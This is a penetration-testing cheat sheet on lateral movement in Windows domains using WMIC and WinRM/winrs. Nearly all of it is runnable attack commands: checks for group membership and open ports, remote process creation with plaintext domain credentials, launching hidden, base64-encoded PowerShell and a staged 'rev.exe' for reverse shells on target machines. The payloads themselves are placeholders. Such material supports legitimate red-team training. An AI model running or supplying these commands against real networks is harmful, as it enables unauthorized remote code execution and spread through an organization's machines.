Skip to main content

πŸ’₯ Wmi & Winrm

Wmic​

🧠 What’s the Deal?​

WMIC (Windows Management Instrumentation Command-line) is a built-in tool in Windows that lets administrators (or attackers) interact with WMI. Attackers abuse it for lateral movement without dropping extra files (living-off-the-land).

The attacker uses WMIC to remotely execute a process on another machine in the network.

🧰 Gear Up (Prereqs)​

There are certain requirements for this attack to work

  • Credentials of a domain user (member of local Administrators group)
  • Network connectivity to target over TCP 135 (RPC) and TCP 445 (SMB)
  • Remote WMI & DCOM access allowed (often open in AD).
  • transfer wmic tool in the windows machine.

Quick checks before Exploitation​

before diving into exploitation it's better to check if you can execute command or not and you have relevent access

Check Group MemberShips​

  • Remote Management Users β†’ required for WinRM.
  • Distributed COM Users β†’ for WMI.
  • Administrators / Domain Admins β†’ best-case, gives full control.
Get-DomainGroupMember -Identity "Remote Management Users"
Get-DomainGroupMember -Identity "Distributed COM Users"

Checking Network Access​

Test-NetConnection -ComputerName 192.168.206.97 -Port 5985

Check If winRM enabled​

winrm quickconfig

Checking WMI​

wmic /node:TARGET_IP /user:DOMAIN\User /password:Pass123 os get caption

OR PowerShell Command

Get-WmiObject -Class Win32_OperatingSystem -ComputerName TARGET -Credential DOMAIN\User

Checking WINRM​

winrs -r:TARGET_IP -u:DOMAIN\User -p:Pass123 ipconfig

OR PowerShell command

Enter-PSSession -ComputerName TARGET -Credential DOMAIN\User

πŸš€ Launch Sequence (How-To)​

Use below commands to create new process and execute commands

Using wmic tool​

  1. To execute commands
wmic /node:TARGET_IP /user:DOMAIN\user /password:Pass123 process call create "cmd.exe /c whoami"
  • /node: β†’ target system
  • /user: and /password: β†’ credentials
  • process call create β†’ creates a process remotely
  • This runs whoami on the target and returns results.
  1. To get reverse shell using powershell
wmic /node:TARGET process call create "powershell -enc <base64_payload>"
  1. To execute binaries on the remote machine
wmic /node:TARGET_IP process call create "C:\Users\Public\rev.exe"

Using winrs tool​

It’s like WMIC, but instead of WMI/DCOM, it uses WinRM (Windows Remote Management) over HTTP/HTTPS (ports 5985 / 5986).

PreReq​

  • Valid credentials (domain/local user).
  • Target machine must have WinRM enabled (default on servers, often disabled on workstations).
  • User must be allowed in the β€œRemote Management Users” group or be an administrator on the target.

Commands​

  1. Executing commands
winrs -r:TARGET_IP -u:DOMAIN\user -p:Password123 "ipconfig /all"
  • -r: β†’ target host (IP or hostname).
  • -u: and -p: β†’ credentials.
  • The quoted part is the command executed remotely.
  1. Executing binaries (like reverse shell)
winrs -r:TARGET_IP "C:\Users\Public\rev.exe"
  1. Run powershell commands (for reverse shell)
winrs -r:TARGET_IP -u:DOMAIN\user -p:Password123 "powershell -nop -w hidden -e <base_64_enc_PS_Command>"